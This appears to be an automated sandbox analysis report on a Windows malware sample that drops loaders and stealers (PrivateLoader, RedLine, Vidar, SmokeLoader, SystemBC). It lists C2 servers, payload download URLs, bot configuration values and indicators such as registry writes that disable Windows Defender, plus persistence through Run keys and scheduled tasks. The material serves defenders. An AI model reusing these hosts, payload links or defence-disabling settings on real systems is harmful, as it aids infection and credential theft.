nymaim | f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b

Analysis

max time kernel
160s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25-09-2022 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

400KB
MD5

9519c85c644869f182927d93e8e25a33
SHA1

eadc9026e041f7013056f80e068ecf95940ea060
SHA256

f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b
SHA512

dcc1dd25bba19aaf75ec4a1a69dc215eb519e9ee3b8f7b1bd16164b736b3aa81389c076ed4e8a17a1cbfaec2e0b3155df039d1bca3c7186cfeb9950369bccf23
SSDEEP

6144:NrkuBHTtY9Jgfq80nzm5tBD2AsG8x0Ca0Hv06A0md0OUGHLzmijOceK2HSw3pXqC:NrkIT/y8T5PVsSnXOc+HSQJKLw

Malware Config

Extracted

Family

privateloader

http://163.123.143.4/proxies.txt

http://107.182.129.251/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

163.123.143.12

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

vidar

Version

54.6

Botnet

1684

https://t.me/huobiinside

https://mas.to/@kyriazhs1975

Attributes

profile_id
1684

Extracted

Family

nymaim

208.67.104.97

85.31.46.167

Extracted

Family

redline

Botnet

79.110.62.196:26277

Attributes

auth_value
816ac5464b927ccf821adf9e972e19e6

Extracted

Family

systembc

109.107.187.226:4001

Extracted

Family

redline

Botnet

persom

jamesmillion2.xyz:9420

Attributes

auth_value
137bd1eac4aceab2e4dd53bce2d4c890

Signatures

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3576-211-0x00000000006D0000-0x00000000006D9000-memory.dmp	family_smokeloader
behavioral2/memory/4472-221-0x00000000005A0000-0x00000000005A9000-memory.dmp	family_smokeloader

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

pWj0tbKPBIqzl8cWzJJduyGL.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	pWj0tbKPBIqzl8cWzJJduyGL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	pWj0tbKPBIqzl8cWzJJduyGL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	pWj0tbKPBIqzl8cWzJJduyGL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	pWj0tbKPBIqzl8cWzJJduyGL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	pWj0tbKPBIqzl8cWzJJduyGL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	pWj0tbKPBIqzl8cWzJJduyGL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	pWj0tbKPBIqzl8cWzJJduyGL.exe

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3244 2868 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3244	2868	rundll32.exe

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3092-180-0x0000000000670000-0x00000000006D0000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\6y4NS38kRIyK2Z25oW9VrEFh.exe	family_redline
C:\Users\Admin\Pictures\Adobe Films\6y4NS38kRIyK2Z25oW9VrEFh.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

Processes:

DnsService.exeDnsService.exeDnsService.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe

Executes dropped EXE 40 IoCs

Processes:

pWj0tbKPBIqzl8cWzJJduyGL.exe6y4NS38kRIyK2Z25oW9VrEFh.exeeBBPs9p8UcczEuumUSDGSxxB.exeD5rdmmEor9e88AqOP7wSSW07.exelw4HgUE2VHomfhZybqsJpcPN.exe1xOiJqj_MxGvI6EvRdq5Rfgc.exeGAoB14GSP2133Y2sgeRaXsqZ.exeMQTpTD4UMUpqKOnazuXqlAv0.exeyv0boMk9qm661CDaxW2QCjxR.exeWerFault.exe0a2MjfgeUg1OpH55ydagt_Xk.exeShoibKSKqd2CZrfAjbtNGyiK.exepY2mcXl4cTwjPt93kUE8Pf6n.exeLDSbuQRihOeKtKJpQqnWTvQf.exeVLxhOe2ZaQSVLOWkXp1aonVr.exeD5rdmmEor9e88AqOP7wSSW07.tmpInstall.exelw4HgUE2VHomfhZybqsJpcPN.exeInstall.exeAdblock.execrashpad_handler.exe54258592853842761999.exerovwer.exeAdblockInstaller.exeAdblockInstaller.tmpsocksupd.exeDnsService.exeDnsService.exeDnsService.exeCleaner.exewinupdater.exeQuite.exe.pifComparisons.exe.pifwbnqvrh.exerovwer.exeComparisons.exe.pifQuite.exe.pifwbnqvrh.exeumJBJNs.exerovwer.exe

pid	process
4960	pWj0tbKPBIqzl8cWzJJduyGL.exe
3092	6y4NS38kRIyK2Z25oW9VrEFh.exe
2328	eBBPs9p8UcczEuumUSDGSxxB.exe
3208	D5rdmmEor9e88AqOP7wSSW07.exe
4084	lw4HgUE2VHomfhZybqsJpcPN.exe
4060	1xOiJqj_MxGvI6EvRdq5Rfgc.exe
3576	GAoB14GSP2133Y2sgeRaXsqZ.exe
2548	MQTpTD4UMUpqKOnazuXqlAv0.exe
8	yv0boMk9qm661CDaxW2QCjxR.exe
4652	WerFault.exe
2956	0a2MjfgeUg1OpH55ydagt_Xk.exe
4224	ShoibKSKqd2CZrfAjbtNGyiK.exe
3732	pY2mcXl4cTwjPt93kUE8Pf6n.exe
1852	LDSbuQRihOeKtKJpQqnWTvQf.exe
4472	VLxhOe2ZaQSVLOWkXp1aonVr.exe
652	D5rdmmEor9e88AqOP7wSSW07.tmp
60	Install.exe
3252	lw4HgUE2VHomfhZybqsJpcPN.exe
4148	Install.exe
4248	Adblock.exe
2636	crashpad_handler.exe
2180	54258592853842761999.exe
4196	rovwer.exe
2396	AdblockInstaller.exe
1408	AdblockInstaller.tmp
2404	socksupd.exe
4480	DnsService.exe
3700	DnsService.exe
3988	DnsService.exe
3536	Cleaner.exe
2476	winupdater.exe
2472	Quite.exe.pif
3780	Comparisons.exe.pif
3188	wbnqvrh.exe
5548	rovwer.exe
5820	Comparisons.exe.pif
5880	Quite.exe.pif
1436	wbnqvrh.exe
4032	umJBJNs.exe
5352	rovwer.exe

Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

5028 netsh.exe

pid	process
5028	netsh.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4224-193-0x00000000000F0000-0x00000000013AC000-memory.dmp	upx
C:\Users\Admin\Pictures\Adobe Films\ShoibKSKqd2CZrfAjbtNGyiK.exe	upx
C:\Users\Admin\Pictures\Adobe Films\ShoibKSKqd2CZrfAjbtNGyiK.exe	upx
behavioral2/memory/4224-296-0x00000000000F0000-0x00000000013AC000-memory.dmp	upx
behavioral2/memory/2476-355-0x0000000000930000-0x0000000001BCF000-memory.dmp	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/4652-184-0x0000000140000000-0x0000000140609000-memory.dmp	vmprotect
C:\Users\Admin\Pictures\Adobe Films\7UvYpp5v1PjdPCBVzR9hMEU5.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\7UvYpp5v1PjdPCBVzR9hMEU5.exe	vmprotect

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

54258592853842761999.exeyv0boMk9qm661CDaxW2QCjxR.exeLDSbuQRihOeKtKJpQqnWTvQf.exelw4HgUE2VHomfhZybqsJpcPN.exeD5rdmmEor9e88AqOP7wSSW07.tmpInstall.exe0a2MjfgeUg1OpH55ydagt_Xk.exetmp.exepWj0tbKPBIqzl8cWzJJduyGL.exeAdblock.exerovwer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	54258592853842761999.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	yv0boMk9qm661CDaxW2QCjxR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	LDSbuQRihOeKtKJpQqnWTvQf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	lw4HgUE2VHomfhZybqsJpcPN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	D5rdmmEor9e88AqOP7wSSW07.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	0a2MjfgeUg1OpH55ydagt_Xk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	pWj0tbKPBIqzl8cWzJJduyGL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Adblock.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	rovwer.exe

Drops startup file 1 IoCs

Processes:

Adblock.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk Adblock.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk	Adblock.exe

Loads dropped DLL 26 IoCs

Processes:

D5rdmmEor9e88AqOP7wSSW07.tmprundll32.exerovwer.exe0a2MjfgeUg1OpH55ydagt_Xk.exeAdblock.exeAdblockInstaller.tmprundll32.exeComparisons.exe.pifQuite.exe.pif

pid	process
652	D5rdmmEor9e88AqOP7wSSW07.tmp
2640	rundll32.exe
4196	rovwer.exe
2956	0a2MjfgeUg1OpH55ydagt_Xk.exe
2956	0a2MjfgeUg1OpH55ydagt_Xk.exe
4248	Adblock.exe
4248	Adblock.exe
4248	Adblock.exe
4248	Adblock.exe
4248	Adblock.exe
4248	Adblock.exe
1408	AdblockInstaller.tmp
232	rundll32.exe
232	rundll32.exe
3780	Comparisons.exe.pif
2472	Quite.exe.pif
3780	Comparisons.exe.pif
3780	Comparisons.exe.pif
3780	Comparisons.exe.pif
3780	Comparisons.exe.pif
3780	Comparisons.exe.pif
2472	Quite.exe.pif
2472	Quite.exe.pif
2472	Quite.exe.pif
2472	Quite.exe.pif
2472	Quite.exe.pif

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Unexpected DNS network traffic destination 64 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	76.76.19.19
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	76.76.19.19

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

pY2mcXl4cTwjPt93kUE8Pf6n.exeMQTpTD4UMUpqKOnazuXqlAv0.exerovwer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	pY2mcXl4cTwjPt93kUE8Pf6n.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	pY2mcXl4cTwjPt93kUE8Pf6n.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	MQTpTD4UMUpqKOnazuXqlAv0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	MQTpTD4UMUpqKOnazuXqlAv0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socksupd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000003001\\socksupd.exe"	rovwer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupdater.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000004001\\winupdater.exe"	rovwer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ipinfo.io
32 ipinfo.io
33 ipinfo.io
22 ipinfo.io
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe

flow	ioc
23	ipinfo.io
32	ipinfo.io
33	ipinfo.io
22	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

eBBPs9p8UcczEuumUSDGSxxB.exeComparisons.exe.pifQuite.exe.pif

description	pid	process	target process
PID 2328 set thread context of 640	2328	eBBPs9p8UcczEuumUSDGSxxB.exe	InstallUtil.exe
PID 3780 set thread context of 5820	3780	Comparisons.exe.pif	Comparisons.exe.pif
PID 2472 set thread context of 5880	2472	Quite.exe.pif	Quite.exe.pif

Drops file in Program Files directory 2 IoCs

Processes:

tmp.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	tmp.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	tmp.exe

Drops file in Windows directory 3 IoCs

Processes:

socksupd.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\wbnqvrh.job	socksupd.exe
File opened for modification	C:\Windows\Tasks\wbnqvrh.job	socksupd.exe
File created	C:\Windows\Tasks\beNJzxXkYGhzSCmkZn.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2180	4652	WerFault.exe	7UvYpp5v1PjdPCBVzR9hMEU5.exe
5108	4472	WerFault.exe	VLxhOe2ZaQSVLOWkXp1aonVr.exe
3976	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
3064	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
1076	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
2628	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
720	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
4188	4196	WerFault.exe	rundll32.exe
3188	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
4000	2956	WerFault.exe	0a2MjfgeUg1OpH55ydagt_Xk.exe
4652	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
1076	2180	WerFault.exe	54258592853842761999.exe
3500	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
5748	8	WerFault.exe	yv0boMk9qm661CDaxW2QCjxR.exe
5896	5548	WerFault.exe	rovwer.exe
6140	2404	WerFault.exe	socksupd.exe
5196	3188	WerFault.exe	wbnqvrh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

GAoB14GSP2133Y2sgeRaXsqZ.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	GAoB14GSP2133Y2sgeRaXsqZ.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	GAoB14GSP2133Y2sgeRaXsqZ.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	GAoB14GSP2133Y2sgeRaXsqZ.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0a2MjfgeUg1OpH55ydagt_Xk.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	0a2MjfgeUg1OpH55ydagt_Xk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	0a2MjfgeUg1OpH55ydagt_Xk.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5164 schtasks.exe
508 schtasks.exe
2040 schtasks.exe
3840 schtasks.exe
4388 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4972 timeout.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4608 tasklist.exe
4188 tasklist.exe
4392 tasklist.exe
3876 tasklist.exe

pid	process
5164	schtasks.exe
508	schtasks.exe
2040	schtasks.exe
3840	schtasks.exe
4388	schtasks.exe

pid	process
4972	timeout.exe

pid	process
4608	tasklist.exe
4188	tasklist.exe
4392	tasklist.exe
3876	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2064 taskkill.exe
3988 taskkill.exe

pid	process
2064	taskkill.exe
3988	taskkill.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
